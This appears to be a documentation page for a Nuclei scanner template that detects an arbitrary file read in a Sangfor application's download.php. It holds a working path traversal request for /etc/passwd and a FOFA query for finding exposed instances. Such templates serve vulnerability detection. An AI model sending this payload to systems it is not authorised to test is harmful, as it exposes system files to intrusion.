Skip to content

Sangfor Application download.php - Arbitary File Read

ID: sangfor-download-lfi

Severity: high

Author: DhiyaneshDk

Tags: lfi,sangfor

There is an arbitrary file reading vulnerability in the Sangfor Application download.php.

id: sangfor-download-lfi
info:
name: Sangfor Application download.php - Arbitary File Read
author: DhiyaneshDk
severity: high
description: |
There is an arbitrary file reading vulnerability in the Sangfor Application download.php.
reference:
- https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%B7%B1%E4%BF%A1%E6%9C%8D%20%E5%BA%94%E7%94%A8%E4%BA%A4%E4%BB%98%E6%8A%A5%E8%A1%A8%E7%B3%BB%E7%BB%9F%20download.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md?plain=1
metadata:
verified: true
max-request: 1
fofa-query: app="SANGFOR-应用交付报表系统"
tags: lfi,sangfor
http:
- method: GET
path:
- '{{BaseURL}}/report/download.php?pdf=../../../../../etc/passwd'
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'root:.*:0:0:'
- type: word
part: header
words:
- application/force-download
- 'filename="passwd"'
condition: and
- type: status
status:
- 200
# digest: 490a004630440220582b7792918bb051389d9b5fc525691855a3ded8fda131cb55a09f8f9e3b1f83022076d6207e535a091c0b08223582d61cbddace355759a10c3cc6e8d5411a5bbb53:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/sangfor-download-lfi.yaml"

View on Github